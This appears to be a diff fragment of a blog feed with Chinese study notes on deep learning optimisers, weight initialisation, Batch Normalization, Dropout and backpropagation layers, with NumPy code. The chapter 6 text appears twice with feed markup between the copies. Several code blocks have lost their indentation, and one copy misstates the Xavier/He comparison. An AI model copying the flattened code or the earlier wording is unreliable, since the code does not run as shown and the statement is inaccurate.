    self.m = None
    self.v = None


    def update(self, params, grads):
    if self.m is None:
    self.m, self.v = {}, {}
    for key, val in params.items():
    self.m[key] = np.zeros_like(val)
    self.v[key] = np.zeros_like(val)
    self.iter += 1
    lr_t = self.lr * np.sqrt(1.0 - self.beta2**self.iter) / (1.0 - self.beta1**self.iter)
    for key in params.keys():
    self.m[key] += (1 - self.beta1) * (grads[key] - self.m[key])
    self.v[key] += (1 - self.beta2) * (grads[key]**2 - self.v[key])
    params[key] -= lr_t * self.m[key] / (np.sqrt(self.v[key]) + 1e-7)

    很多研究中至今仍在使用 SGD。Momentum 和 AdaGrad 也是值得一试的方法。最近,很多研究人员和技术人员都喜欢用 Adam。

    6.2 权重的初始值

    6.2.1 可以将权重初始值设为 0 吗

    不行。为了防止“权重均一化”(严格地讲,是为了瓦解权重的对称结构),必须随机生成初始值。

    6.2.2 隐藏层的激活值的分布

    随着输出不断地靠近 0(或者靠近 1),它的导数的值逐渐接近 0。因此,偏向 0 和 1 的数据分布会造成反向传播中梯度的值不断变小,最后消失。这个问题称为梯度消失(gradient vanishing)。层次加深的深度学习中,梯度消失的问题可能会更加严重。

    现在,在一般的深度学习框架中,Xavier 初始值已被作为标准使用。比如,Caffe 框架中,通过在设定权重初始值时赋予 xavier 参数,就可以使用 Xavier 初始值。

    Xavier 初始值:与前一层有 $n$ 个节点连接时,初始值使用标准差为 $\frac{1}{\sqrt n}$ 的分布。

    node_num = 100 # 前一层的节点数
    w = np.random.randn(node_num, node_num) / np.sqrt(node_num)


    6.2.3 ReLU 的权重初始值

    Xavier 初始值是以激活函数是线性函数为前提而推导出来的。因为 sigmoid 函数和 tanh 函数左右对称,且中央附近可以视作线性函数,所以适合使用 Xavier 初始值。但当激活函数使用 ReLU 时,一般推荐使用 ReLU 专用的初始值,也就是 Kaiming He 等人推荐的初始值,也称为“He 初始值”。

    当前一层的节点数为 $n$ 时,He 初始值使用标准差为 $\sqrt\frac{2}{n}$ 的高斯分布。当 Xavier 初始值是 $\frac{1}{n}$ 时,(直观上)可以解释为,因为 ReLU 的负值区域的值为 0,为了使它更有广度,所以需要 2 倍的系数。

    6.3 Batch Normalization

• 如果设定了合适的权重初始值,则各层的激活值分布会有适当的广度,从而可以顺利地进行学习。

    • Batch Normalization 为了使各层拥有适当的广度,“强制性”地调整激活值的分布。

    Batch Normalization 的优点:

    • 可以使学习快速进行(可以增大学习率)。

    • 不那么依赖初始值(对于初始值不用那么神经质)。

    • 抑制过拟合(降低 Dropout 等的必要性)。

    6.3.1 Batch Normalization 的算法

    Batch Norm,顾名思义,以进行学习时的 mini-batch 为单位,按 minibatch 进行正规化。具体而言,就是进行使数据分布的均值为 0、方差为 1 的正规化。

    对于 mini-batch 的 $m$ 个输入数据的集合 $B$:

    $\mu_B \leftarrow \frac{1}{m}\sum^m_{i=1}x_i$,求均值

$\sigma^2_B\leftarrow \frac{1}{m}\sum^m_{i=1}\left(x_i-\mu_B\right)^2$,求方差

    $\hat x_i\leftarrow\frac{x_i-\mu_B}{\sqrt{\sigma^2_B+\varepsilon}}$,$\varepsilon$ 是一个微小值,如 $10^{-7}$ 等,防止出现除以 0 的情况。

    将 mini-batch 的输入数据 ${x_1, x_2, …, x_m}$ 变换为均值为 0,方差为 1 的数据 ${\hat x_1,\hat x_2,…,\hat x_m}$,接着,Batch Norm 层会对正规化后的数据进行缩放和平移的变换:

    $$y_i\leftarrow\gamma\hat x_i+\beta$$

    这里,$\gamma$ 和 $\beta$ 是参数。一开始 $\gamma = 1, \beta = 0$,然后再通过学习调整到合适的值。

    6.4 正则化

    6.4.1 过拟合

    • 模型拥有大量参数、表现力强。

    • 训练数据少。

    6.4.2 权值衰减

    权值衰减是一直以来经常被使用的一种抑制过拟合的方法。该方法通过在学习的过程中对大的权重进行惩罚,来抑制过拟合。

    损失函数加上权重的平方范数(L2 范数)。这样一来,就可以抑制权重变大。

L2 范数相当于各个元素的平方和的平方根。用数学式表示的话,假设有权重 $\mathbf W= (w_1, w_2, \dots , w_n)$,则 L2 范数可用 $\sqrt{w_1^2+w_2^2+\cdots+w_n^2}$ 计算出来。除了 L2 范数,还有 L1 范数、L∞ 范数等。L1 范数是各个元素的绝对值之和,相当于 $|w_1| + |w_2| + \cdots + |w_n|$。L∞ 范数也称为 Max 范数,相当于各个元素的绝对值中最大的那一个。L2 范数、L1 范数、L∞ 范数都可以用作正则化项,它们各有各的特点,不过这里我们要实现的是比较常用的 L2 范数。

    6.4.3 Dropout

    Dropout 是一种在学习的过程中随机删除神经元的方法。训练时,随机选出隐藏层的神经元,然后将其删除。

    class Dropout:
    def __init__(self, dropout_ratio=0.5):
    self.dropout_ratio = dropout_ratio
    self.mask = None


    def forward(self, x, train_flg=True):
    if train_flg:
    self.mask = np.random.rand(*x.shape) > self.dropout_ratio
    return x * self.mask
    else:
    return x * (1.0 - self.dropout_ratio)


    def backward(self, dout):
    return dout * self.mask

    6.5 超参数的验证

    超参数(hyper-parameter)也经常出现。这里所说的超参数是指,比如各层的神经元数量、batch 大小、参数更新时的学习率或权值衰减等。如果这些超参数没有设置合适的值,模型的性能就会很差。

    6.5.1 验证数据

    如果使用测试数据调整超参数,超参数的值会对测试数据发生过拟合。换句话说,用测试数据确认超参数的值的“好坏”,就会导致超参数的值被调整为只拟合测试数据。

    调整超参数时,必须使用超参数专用的确认数据。用于调整超参数的数据,一般称为验证数据(validation data)

    如果是 MNIST 数据集,获得验证数据的最简单的方法就是从训练数据中事先分割 20%作为验证数据:

    (x_train, t_train), (x_test, t_test) = load_mnist()
    # 打乱训练数据
    x_train, t_train = shuffle_dataset(x_train, t_train)
    # 分割验证数据
    validation_rate = 0.20
    validation_num = int(x_train.shape[0] * validation_rate)
    x_val = x_train[:validation_num]
    t_val = t_train[:validation_num]
    x_train = x_train[validation_num:]
    t_train = t_train[validation_num:]

    6.5.2 超参数的最优化

    步骤 0 设定超参数的范围。

    步骤 1 从设定的超参数范围中随机采样。

    步骤 2 使用步骤 1 中采样到的超参数的值进行学习,通过验证数据评估识别精度(但是要将 epoch 设置得很小)。

    步骤 3 重复步骤 1 和步骤 2(100 次等),根据它们的识别精度的结果,缩小超参数的范围

    6.6 小结

    • 参数的更新方法,除了 SGD 之外,还有 Momentum、AdaGrad、Adam 等方法。

    • 权重初始值的赋值方法对进行正确的学习非常重要。

    • 作为权重初始值,Xavier 初始值、He 初始值等比较有效。

    • 通过使用 Batch Normalization,可以加速学习,并且对初始值变得健壮。

    • 抑制过拟合的正则化技术有权值衰减、Dropout 等。

    • 逐渐缩小“好值”存在的范围是搜索超参数的一个有效方法。

    ]]>
    + 正文

    6.1 参数的更新

    6.1.2 SGD

    $$\mathbf W\leftarrow \mathbf W -\eta\frac{\partial L}{\partial \mathbf W}$$

class SGD:
    def __init__(self, lr=0.01):
        self.lr = lr

    def update(self, params, grads):
        for key in params.keys():
            params[key] -= self.lr * grads[key]
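使用时,只需反复把参数字典和梯度字典交给 update()。下面是一段示意(get_mini_batch 是假想的取 mini-batch 函数,TwoLayerNet 见后文第 5 章):

network = TwoLayerNet(input_size=784, hidden_size=50, output_size=10)
optimizer = SGD(lr=0.01)

for i in range(10000):
    x_batch, t_batch = get_mini_batch()  # 假想的函数,返回一个 mini-batch
    grads = network.gradient(x_batch, t_batch)
    optimizer.update(network.params, grads)

这样,优化方法和网络的实现被解耦,换用 Momentum 等方法时只需替换 optimizer。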

    6.1.3 SGD 的缺点


    如果函数的形状非均向(anisotropic),比如呈延伸状,搜索的路径就会非常低效。因此,我们需要比单纯朝梯度方向前进的 SGD 更聪明的方法。SGD 低效的根本原因是,梯度的方向并没有指向最小值的方向(指向极小值的方向)。

    6.1.4 Momentum


    $$v\leftarrow \alpha v -\eta\frac{\partial L}{\partial \mathbf W}$$

    $$\mathbf W \leftarrow \mathbf W + v$$

    • Momentum 方法给人的感觉就像是小球在地面上滚动。

    • 新出现了一个变量 $v$,对应物理上的速度。

• 新出现的 $\alpha v$ 项在物体不受任何力时,承担使物体逐渐减速的任务($\alpha$ 设定为 0.9 之类的值),对应物理上的地面摩擦或空气阻力。

class Momentum:
    def __init__(self, lr=0.01, momentum=0.9):
        self.lr = lr
        self.momentum = momentum
        self.v = None

    def update(self, params, grads):
        if self.v is None:
            self.v = {}
            for key, val in params.items():
                self.v[key] = np.zeros_like(val)

        for key in params.keys():
            self.v[key] = self.momentum * self.v[key] - self.lr * grads[key]
            params[key] += self.v[key]

    6.1.5 AdaGrad

    在神经网络的学习中,学习率(数学式中记为 $\eta$)的值很重要。

    • 学习率过小,会导致学习花费过多时间;

    • 学习率过大,则会导致学习发散而不能正确进行。

    在关于学习率的有效技巧中,有一种被称为**学习率衰减(learning rate decay)**的方法,即随着学习的进行,使学习率逐渐减小。实际上,一开始“多”学,然后逐渐“少”学的方法,在神经网络的学习中经常被使用。

    $$\mathbf h\leftarrow \mathbf h + \frac{\partial L}{\partial \mathbf W} \odot \frac{\partial L}{\partial \mathbf W}$$

    $$\mathbf W\leftarrow \mathbf W - \eta\frac{1}{\sqrt{\mathbf h}}\frac{\partial L}{\partial \mathbf W}$$

    和前面的 SGD 一样,$\mathbf W$ 表示要更新的权重参数,$\frac{\partial L}{\partial \mathbf W}$表示损失函数关于 $\mathbf W$ 的梯度,$\eta$ 表示学习率。这里新出现了变量 $\mathbf h$,保存了以前的所有梯度值的平方和($\odot$ 表示对应矩阵元素的乘法)。然后,在更新参数时,通过乘以 $\frac{1}{\sqrt{\mathbf h}}$,就可以调整学习的尺度。

    AdaGrad 会记录过去所有梯度的平方和。因此,学习越深入,更新的幅度就越小。实际上,如果无止境地学习,更新量就会变为 0,完全不再更新。为了改善这个问题,可以使用 RMSProp 方法。RMSProp 方法并不是将过去所有的梯度一视同仁地相加,而是逐渐地遗忘过去的梯度,在做加法运算时将新梯度的信息更多地反映出来。这种操作从专业上讲,称为“指数移动平均”,呈指数函数式地减小过去的梯度的尺度。

class AdaGrad:
    def __init__(self, lr=0.01):
        self.lr = lr
        self.h = None

    def update(self, params, grads):
        if self.h is None:
            self.h = {}
            for key, val in params.items():
                self.h[key] = np.zeros_like(val)

        for key in params.keys():
            self.h[key] += grads[key] * grads[key]
            params[key] -= self.lr * grads[key] / (np.sqrt(self.h[key]) + 1e-7)
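上面提到的 RMSProp 书中未给出实现;在 AdaGrad 的基础上,把“平方和”改为指数移动平均即可。下面是一个示意(decay_rate 取 0.99 只是常见设定,并非书中代码):

class RMSProp:
    def __init__(self, lr=0.01, decay_rate=0.99):
        self.lr = lr
        self.decay_rate = decay_rate
        self.h = None

    def update(self, params, grads):
        if self.h is None:
            self.h = {}
            for key, val in params.items():
                self.h[key] = np.zeros_like(val)

        for key in params.keys():
            # 指数移动平均:逐渐遗忘过去的梯度,更多地反映新梯度的信息
            self.h[key] *= self.decay_rate
            self.h[key] += (1 - self.decay_rate) * grads[key] * grads[key]
            params[key] -= self.lr * grads[key] / (np.sqrt(self.h[key]) + 1e-7)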

    6.1.6 Adam

    Adam 是 2015 年提出的新方法。它的理论有些复杂,直观地讲,就是融合了 Momentum 和 AdaGrad 的方法。通过组合前面两个方法的优点,有望实现参数空间的高效搜索。此外,进行超参数的“偏置校正”也是 Adam 的特征。

    Adam 会设置 3 个超参数。一个是学习率(论文中以 $\alpha$ 出现),另外两个是一次 momentum 系数 $\beta_1$ 和二次 momentum 系数 $\beta_2$。根据论文,标准的设定值是 $\beta_1$ 为 0.9,$\beta_2$ 为 0.999。设置了这些值后,大多数情况下都能顺利运行。

class Adam:
    """Adam (http://arxiv.org/abs/1412.6980v8)"""
    def __init__(self, lr=0.001, beta1=0.9, beta2=0.999):
        self.lr = lr
        self.beta1 = beta1
        self.beta2 = beta2
        self.iter = 0
        self.m = None
        self.v = None

    def update(self, params, grads):
        if self.m is None:
            self.m, self.v = {}, {}
            for key, val in params.items():
                self.m[key] = np.zeros_like(val)
                self.v[key] = np.zeros_like(val)

        self.iter += 1
        lr_t = self.lr * np.sqrt(1.0 - self.beta2**self.iter) / (1.0 - self.beta1**self.iter)

        for key in params.keys():
            self.m[key] += (1 - self.beta1) * (grads[key] - self.m[key])
            self.v[key] += (1 - self.beta2) * (grads[key]**2 - self.v[key])
            params[key] -= lr_t * self.m[key] / (np.sqrt(self.v[key]) + 1e-7)

    很多研究中至今仍在使用 SGD。Momentum 和 AdaGrad 也是值得一试的方法。最近,很多研究人员和技术人员都喜欢用 Adam。

    6.2 权重的初始值

    6.2.1 可以将权重初始值设为 0 吗

    不行。为了防止“权重均一化”(严格地讲,是为了瓦解权重的对称结构),必须随机生成初始值。

    6.2.2 隐藏层的激活值的分布

    随着输出不断地靠近 0(或者靠近 1),它的导数的值逐渐接近 0。因此,偏向 0 和 1 的数据分布会造成反向传播中梯度的值不断变小,最后消失。这个问题称为梯度消失(gradient vanishing)。层次加深的深度学习中,梯度消失的问题可能会更加严重。

    现在,在一般的深度学习框架中,Xavier 初始值已被作为标准使用。比如,Caffe 框架中,通过在设定权重初始值时赋予 xavier 参数,就可以使用 Xavier 初始值。

    Xavier 初始值:与前一层有 $n$ 个节点连接时,初始值使用标准差为 $\frac{1}{\sqrt n}$ 的分布。

    node_num = 100 # 前一层的节点数
    w = np.random.randn(node_num, node_num) / np.sqrt(node_num)


    6.2.3 ReLU 的权重初始值

    Xavier 初始值是以激活函数是线性函数为前提而推导出来的。因为 sigmoid 函数和 tanh 函数左右对称,且中央附近可以视作线性函数,所以适合使用 Xavier 初始值。但当激活函数使用 ReLU 时,一般推荐使用 ReLU 专用的初始值,也就是 Kaiming He 等人推荐的初始值,也称为“He 初始值”。

当前一层的节点数为 $n$ 时,He 初始值使用标准差为 $\sqrt{\frac{2}{n}}$ 的高斯分布。由于 Xavier 初始值的标准差是 $\sqrt{\frac{1}{n}}$,(直观上)可以解释为:因为 ReLU 的负值区域的值为 0,为了使激活值更有广度,所以需要 2 倍的系数。
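仿照前面 Xavier 初始值的写法,He 初始值可以这样生成(示意):

node_num = 100  # 前一层的节点数
w = np.random.randn(node_num, node_num) * np.sqrt(2.0 / node_num)  # He 初始值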

    6.3 Batch Normalization

• 如果设定了合适的权重初始值,则各层的激活值分布会有适当的广度,从而可以顺利地进行学习。

    • Batch Normalization 为了使各层拥有适当的广度,“强制性”地调整激活值的分布。

    Batch Normalization 的优点:

    • 可以使学习快速进行(可以增大学习率)。

    • 不那么依赖初始值(对于初始值不用那么神经质)。

    • 抑制过拟合(降低 Dropout 等的必要性)。

    6.3.1 Batch Normalization 的算法

Batch Norm,顾名思义,以进行学习时的 mini-batch 为单位,按 mini-batch 进行正规化。具体而言,就是进行使数据分布的均值为 0、方差为 1 的正规化。

    对于 mini-batch 的 $m$ 个输入数据的集合 $B$:

    $\mu_B \leftarrow \frac{1}{m}\sum^m_{i=1}x_i$,求均值

$\sigma^2_B\leftarrow \frac{1}{m}\sum^m_{i=1}\left(x_i-\mu_B\right)^2$,求方差

    $\hat x_i\leftarrow\frac{x_i-\mu_B}{\sqrt{\sigma^2_B+\varepsilon}}$,$\varepsilon$ 是一个微小值,如 $10^{-7}$ 等,防止出现除以 0 的情况。

将 mini-batch 的输入数据 $\{x_1, x_2, \dots, x_m\}$ 变换为均值为 0、方差为 1 的数据 $\{\hat x_1,\hat x_2,\dots,\hat x_m\}$。接着,Batch Norm 层会对正规化后的数据进行缩放和平移的变换:

    $$y_i\leftarrow\gamma\hat x_i+\beta$$

    这里,$\gamma$ 和 $\beta$ 是参数。一开始 $\gamma = 1, \beta = 0$,然后再通过学习调整到合适的值。
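把上面几个式子按顺序写下来,就是 Batch Norm 正向传播的最小示意(假设 x 的形状为 (N, D),且只考虑训练时按 mini-batch 统计的情况):

def batch_norm_forward(x, gamma, beta, eps=1e-7):
    mu = x.mean(axis=0)                    # 求均值 mu_B
    var = x.var(axis=0)                    # 求方差 sigma^2_B
    x_hat = (x - mu) / np.sqrt(var + eps)  # 正规化
    return gamma * x_hat + beta            # 缩放和平移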

    6.4 正则化

    6.4.1 过拟合

    • 模型拥有大量参数、表现力强。

    • 训练数据少。

    6.4.2 权值衰减

    权值衰减是一直以来经常被使用的一种抑制过拟合的方法。该方法通过在学习的过程中对大的权重进行惩罚,来抑制过拟合。

    损失函数加上权重的平方范数(L2 范数)。这样一来,就可以抑制权重变大。

L2 范数相当于各个元素的平方和的平方根。用数学式表示的话,假设有权重 $\mathbf W= (w_1, w_2, \dots , w_n)$,则 L2 范数可用 $\sqrt{w_1^2+w_2^2+\cdots+w_n^2}$ 计算出来。除了 L2 范数,还有 L1 范数、L∞ 范数等。L1 范数是各个元素的绝对值之和,相当于 $|w_1| + |w_2| + \cdots + |w_n|$。L∞ 范数也称为 Max 范数,相当于各个元素的绝对值中最大的那一个。L2 范数、L1 范数、L∞ 范数都可以用作正则化项,它们各有各的特点,不过这里我们要实现的是比较常用的 L2 范数。
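具体做法示意如下:为损失函数加上 $\frac{1}{2}\lambda W^2$(假设权重都保存在 params 中且键名以 'W' 开头;反向传播时还要相应地给各权重的梯度加上 $\lambda W$):

weight_decay_lambda = 0.1  # 惩罚强度,取值仅为示例

def loss_with_weight_decay(loss, params):
    weight_decay = 0
    for key, W in params.items():
        if key.startswith('W'):  # 假设权重键名以 'W' 开头
            weight_decay += 0.5 * weight_decay_lambda * np.sum(W ** 2)
    return loss + weight_decay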

    6.4.3 Dropout

    Dropout 是一种在学习的过程中随机删除神经元的方法。训练时,随机选出隐藏层的神经元,然后将其删除。

class Dropout:
    def __init__(self, dropout_ratio=0.5):
        self.dropout_ratio = dropout_ratio
        self.mask = None

    def forward(self, x, train_flg=True):
        if train_flg:
            self.mask = np.random.rand(*x.shape) > self.dropout_ratio
            return x * self.mask
        else:
            return x * (1.0 - self.dropout_ratio)

    def backward(self, dout):
        return dout * self.mask
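注意上面的实现中,测试时要给输出乘以保留比例 (1 - dropout_ratio)。更常见的“反向 Dropout”(inverted dropout)则在训练时就完成这个缩放,测试时原样输出。forward 可以改写成如下形式(示意,非书中实现):

    def forward(self, x, train_flg=True):
        if train_flg:
            self.mask = np.random.rand(*x.shape) > self.dropout_ratio
            # 训练时就除以保留比例,测试时无需再缩放
            return x * self.mask / (1.0 - self.dropout_ratio)
        return x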

    6.5 超参数的验证

神经网络中,除了权重和偏置等参数,超参数(hyper-parameter)也经常出现。这里所说的超参数是指,比如各层的神经元数量、batch 大小、参数更新时的学习率或权值衰减等。如果这些超参数没有设置合适的值,模型的性能就会很差。

    6.5.1 验证数据

    如果使用测试数据调整超参数,超参数的值会对测试数据发生过拟合。换句话说,用测试数据确认超参数的值的“好坏”,就会导致超参数的值被调整为只拟合测试数据。

    调整超参数时,必须使用超参数专用的确认数据。用于调整超参数的数据,一般称为验证数据(validation data)

    如果是 MNIST 数据集,获得验证数据的最简单的方法就是从训练数据中事先分割 20%作为验证数据:

    (x_train, t_train), (x_test, t_test) = load_mnist()
    # 打乱训练数据
    x_train, t_train = shuffle_dataset(x_train, t_train)
    # 分割验证数据
    validation_rate = 0.20
    validation_num = int(x_train.shape[0] * validation_rate)
    x_val = x_train[:validation_num]
    t_val = t_train[:validation_num]
    x_train = x_train[validation_num:]
    t_train = t_train[validation_num:]

    6.5.2 超参数的最优化

    步骤 0 设定超参数的范围。

    步骤 1 从设定的超参数范围中随机采样。

    步骤 2 使用步骤 1 中采样到的超参数的值进行学习,通过验证数据评估识别精度(但是要将 epoch 设置得很小)。

    步骤 3 重复步骤 1 和步骤 2(100 次等),根据它们的识别精度的结果,缩小超参数的范围
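步骤 1 中的“随机采样”通常在对数尺度上进行,如下面的示意(采样范围仅为示例):

# 在对数尺度(10 的幂)上随机采样超参数
weight_decay = 10 ** np.random.uniform(-8, -4)  # 权值衰减系数
lr = 10 ** np.random.uniform(-6, -2)            # 学习率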

    6.6 小结

    • 参数的更新方法,除了 SGD 之外,还有 Momentum、AdaGrad、Adam 等方法。

    • 权重初始值的赋值方法对进行正确的学习非常重要。

    • 作为权重初始值,Xavier 初始值、He 初始值等比较有效。

    • 通过使用 Batch Normalization,可以加速学习,并且对初始值变得健壮。

    • 抑制过拟合的正则化技术有权值衰减、Dropout 等。

    • 逐渐缩小“好值”存在的范围是搜索超参数的一个有效方法。

    ]]>
    @@ -8144,7 +8144,7 @@ /posts/DL-%E6%B7%B1%E5%BA%A6%E5%AD%A6%E4%B9%A0%E5%85%A5%E9%97%A8-%E5%9F%BA%E4%BA%8EPython%E7%9A%84%E7%90%86%E8%AE%BA%E4%B8%8E%E5%AE%9E%E7%8E%B0-5-%E8%AF%AF%E5%B7%AE%E5%8F%8D%E5%90%91%E4%BC%A0%E6%92%AD%E6%B3%95/ - 正文

    理解误差反向传播法:

    • 基于数学式

    • 基于计算图

    5.1 计算图

    5.1.1 用计算图求解

    “从左向右进行计算”是一种正方向上的传播,简称为正向传播(forward propagation)。正向传播是从计算图出发点到结束点的传播。

    既然有正向传播这个名称,当然也可以考虑反向(从图上看的话,就是从右向左)的传播。实际上,这种传播称为反向传播(backward propagation)。反向传播将在接下来的导数计算中发挥重要作用。

    5.1.2 局部计算


    例如苹果和其他很多东西的求和运算(4000 + 200 → 4200)并不关心 4000 这个数字是如何计算而来的,只要把两个数字相加就可以了。换言之,各个节点处只需进行与自己有关的计算(在这个例子中是对输入的两个数字进行加法运算),不用考虑全局。

    5.1.3 为何用计算图解题


    这里,假设我们想知道苹果价格的上涨会在多大程度上影响最终的支付金额,即求“支付金额关于苹果的价格的导数”。设苹果的价格为 $x$,支付金额为 $L$,则相当于求

    $$\frac{\partial L}{\partial x}$$

    这个导数的值表示当苹果的价格稍微上涨时,支付金额会增加多少。

    反向传播从右向左传递导数的值(1→1.1→2.2)。从这个结果中可知,“支付金额关于苹果的价格的导数”的值是 2.2。这意味着,如果苹果的价格上涨 1 日元,最终的支付金额会增加 2.2 日元(严格地讲,如果苹果的价格增加某个微小值,则最终的支付金额将增加那个微小值的 2.2 倍)。

    5.2 链式法则

    计算图的正向传播将计算结果正向(从左到右)传递,其计算过程是我们日常接触的计算过程,所以感觉上可能比较自然。

    反向传播将局部导数向正方向的反方向(从右到左)传递,一开始可能会让人感到困惑。传递这个局部导数的原理,是基于**链式法则(chain rule)**的。

    5.2.2 什么是链式法则

    先从复合函数说起。复合函数是由多个函数构成的函数。比如,$z=(x+y)^2$ 是由下式所示的两个式子构成的。

$$z=t^2,\quad t=x+y$$

    链式法则是关于复合函数的导数的性质,定义如下:

    如果某个函数由复合函数表示,则该复合函数的导数可以用构成复合函数的各个函数的导数的乘积表示。

    $$\frac{\partial z}{\partial x} = \frac{\partial z}{\partial t} \frac{\partial t}{\partial x} = 2t \cdot 1 = 2(x+y)$$

    5.2.3 链式法则和计算图


    根据计算图的反向传播的结果,$\frac{\partial z}{\partial x}=2(x+y)$,计算图的反向传播是基于链式法则成立的。

    5.3 反向传播

    5.3.1 加法节点的反向传播


    考虑 $z=x+y$,$\frac{\partial z}{\partial x}=1,\frac{\partial z}{\partial y}=1$

    $z=x+y$ 的计算位于这个大型计算图的某个地方,从上游会传来 $\frac{\partial L}{\partial z}$ 的值,并向下游传递 $\frac{\partial L}{\partial x}$ 和 $\frac{\partial L}{\partial y}$。

    5.3.2 乘法节点的反向传播

    考虑 $z=xy$,则 $\frac{\partial z}{\partial x}=y, \frac{\partial z}{\partial y}=x$


    加法的反向传播只是将上游的值传给下游,并不需要正向传播的输入信号。但是,乘法的反向传播需要正向传播时的输入信号值。因此,实现乘法节点的反向传播时,要保存正向传播的输入信号。

    5.3.3 苹果的例子

    这里要解的问题是苹果的价格、苹果的个数、消费税这 3 个变量各自如何影响最终支付的金额。这个问题相当于求“支付金额关于苹果的价格的导数”“支付金额关于苹果的个数的导数”“支付金额关于消费税的导数”。

    5.4 简单层的实现

    把要实现的计算图的乘法节点称为“乘法层”(MulLayer),加法节点称为“加法层”(AddLayer)。

    5.4.1 乘法层的实现

层的实现中有两个共通的方法(接口):forward() 和 backward()。forward() 对应正向传播,backward() 对应反向传播。

    考虑 $z=xy$,则 $\frac{\partial z}{\partial x}=y, \frac{\partial z}{\partial y}=x$

    class MulLayer:
    def __init__(self):
    """
    定义 x 和 y(保存正向传播的输入信号)
    """
    self.x = None
    self.y = None


    def forward(self, x, y):
    self.x = x
    self.y = y
    out = x * y

    return out


    def backward(self, dout):
    dx = dout * self.y # 翻转 x 和 y
    dy = dout * self.x
    return dx, dy
    apple = 100
    apple_num = 2
    tax = 1.1

    # layer
    mul_apple_layer = MulLayer()
    mul_tax_layer = MulLayer()

    # forward
    apple_price = mul_apple_layer.forward(apple, apple_num) # 苹果总价
    price = mul_tax_layer.forward(apple_price, tax) # 加上税收总价
    print(price) # 220
    220.00000000000003

    此外,关于各个变量的导数可由backward()求出。

    # backward
    dprice = 1
    dapple_price, dtax = mul_tax_layer.backward(dprice)
    dapple, dapple_num = mul_apple_layer.backward(dapple_price)
    print(dapple, dapple_num, dtax) # 2.2 110 200
    2.2 110.00000000000001 200

    5.4.2 加法层的实现

    class AddLayer:
    def __init__(self):
    """
    加法层不需要特意进行初始化,所以__init__()中什么也不运行
    """
    pass


    def forward(self, x, y):
    out = x + y
    return out


    def backward(self, dout):
    dx = dout * 1
    dy = dout * 1
    return dx, dy

    使用加法层和乘法层,实现上图所示的购买 2 个苹果和 3 个橘子。

    apple = 100
    apple_num = 2
    orange = 150
    orange_num = 3
    tax = 1.1

    # layer 生成必要的层
    mul_apple_layer = MulLayer()
    mul_orange_layer = MulLayer()
    add_apple_orange_layer = AddLayer()
    mul_tax_layer = MulLayer()

    # forward 合适的顺序调用正向传播的 forward() 方法
    apple_price = mul_apple_layer.forward(apple, apple_num) #(1)
    orange_price = mul_orange_layer.forward(orange, orange_num) #(2)
    all_price = add_apple_orange_layer.forward(apple_price, orange_price) #(3)
    price = mul_tax_layer.forward(all_price, tax) #(4)

    # backward 与正向传播相反的顺序调用反向传播的 backward() 方法
    dprice = 1
    dall_price, dtax = mul_tax_layer.backward(dprice) #(4)
    dapple_price, dorange_price = add_apple_orange_layer.backward(dall_price) #(3)
    dorange, dorange_num = mul_orange_layer.backward(dorange_price) #(2)
    dapple, dapple_num = mul_apple_layer.backward(dapple_price) #(1)

    print(price) # 715
    print(dapple_num, dapple, dorange, dorange_num, dtax) # 110 2.2 3.3 165 650
715.0000000000001
110.00000000000001 2.2 3.3000000000000003 165.0 650

    5.5 激活函数层的实现

    5.5.1 ReLU 层

    ReLU 由下式表示:

$$y=\begin{cases}x & (x>0)\\ 0 & (x\le 0)\end{cases}$$

$$\frac{\partial y}{\partial x}=\begin{cases}1 & (x>0)\\ 0 & (x\le 0)\end{cases}$$

    class Relu:
    def __init__(self):
    self.mask = None


    def forward(self, x):
    """
    mask 是由 True/False 构成的 NumPy 数组,
    它会把正向传播时的输入 x 的元素中小于等于 0 的地方保存为 True,
    其他地方(大于 0 的元素)保存为 False
    """
    self.mask = (x <= 0)
    out = x.copy()
    out[self.mask] = 0

    return out


    def backward(self, dout):
    """
    如果正向传播时的输入值小于等于 0,则反向传播的值为 0
    反向传播中会使用正向传播时保存的 mask,
    将从上游传来的 dout 的 mask 中的元素为 True 的地方设为 0
    """
    dout[self.mask] = 0
    dx = dout

    return dx

    5.5.2 Sigmoid 层

$$
\begin{aligned}
y &= \frac{1}{1+\exp(-x)} \\
y' &= \left(\frac{1}{1+\exp(-x)}\right)' \\
&= -y^2\left(-\exp(-x)\right) \\
&= y^2\exp(-x) \\
&= y(1-y)
\end{aligned}
$$

    class Sigmoid:
    def __init__(self):
    self.out = None


    def forward(self, x):
    """
    正向传播时将输出保存在了实例变量 out 中
    """
    out = 1 / (1 + np.exp(-x))
    self.out = out

    return out


    def backward(self, dout):
    """
    反向传播时,使用该变量 out 进行计算
    """
    dx = dout * (1.0 - self.out) * self.out

    return dx

    5.6 Affine/Softmax 层的实现

    5.6.1 Affine 层

    神经网络的正向传播中进行的矩阵的乘积运算在几何学领域被称为“仿射变换”A。因此,这里将进行仿射变换的处理实现为“Affine 层”。

    仿射层(Affine Layer)
    神经网络中的一个全连接层。仿射(Affine)的意思是前面一层中的每一个神经元都连接到当前层中的每一个神经元。在许多方面,这是神经网络的「标准」层。仿射层通常被加在卷积神经网络或循环神经网络做出最终预测前的输出的顶层。仿射层的一般形式为 $y=f(Wx+b)$,其中 $x$ 是层输入,$w$ 是参数,$b$ 是一个偏差矢量,$f$ 是一个非线性激活函数。

    5.6.2 批版本的 Affine 层


    1. $\frac{\partial L}{\partial \mathbf X} = \frac{\partial L}{\partial \mathbf Y}\cdot \mathbf W^T$

    2. $\frac{\partial L}{\partial \mathbf W} = \mathbf X^T\cdot \frac{\partial L}{\partial \mathbf Y}$

    3. $\frac{\partial L}{\partial \mathbf B} = \frac{\partial L}{\partial \mathbf Y}$ 的第一个轴(第 0 轴)方向上的和

    class Affine:
    def __init__(self, W, b):
    self.W = W
    self.b = b
    self.x = None
    self.dW = None
    self.db = None


    def forward(self, x):
    self.x = x
    out = np.dot(x, self.W) + self.b

    return out


    def backward(self, dout):
    dx = np.dot(dout, self.W.T) # (1)
    self.dW = np.dot(self.x.T, dout) # (2)
    self.db = np.sum(dout, axis=0) # (3)

    return dx

    5.6.3 Softmax-with-Loss 层

    class SoftmaxWithLoss:
    def __init__(self):
    self.loss = None # 损失
    self.y = None # softmax 的输出
    self.t = None # 监督数据(one-hot vector)


    def forward(self, x, t):
    self.t = t
    self.y = softmax(x)
    self.loss = cross_entropy_error(self.y, self.t)

    return self.loss


    def backward(self, dout=1):
    batch_size = self.t.shape[0]
    dx = (self.y - self.t) / batch_size

    return dx

    5.7 误差反向传播法的实现

    5.7.1 神经网络学习的全貌图

    前提

    神经网络中有合适的权重和偏置,调整权重和偏置以便拟合训练数据的过程称为学习。神经网络的学习分为下面 4 个步骤。

    步骤 1(mini-batch)

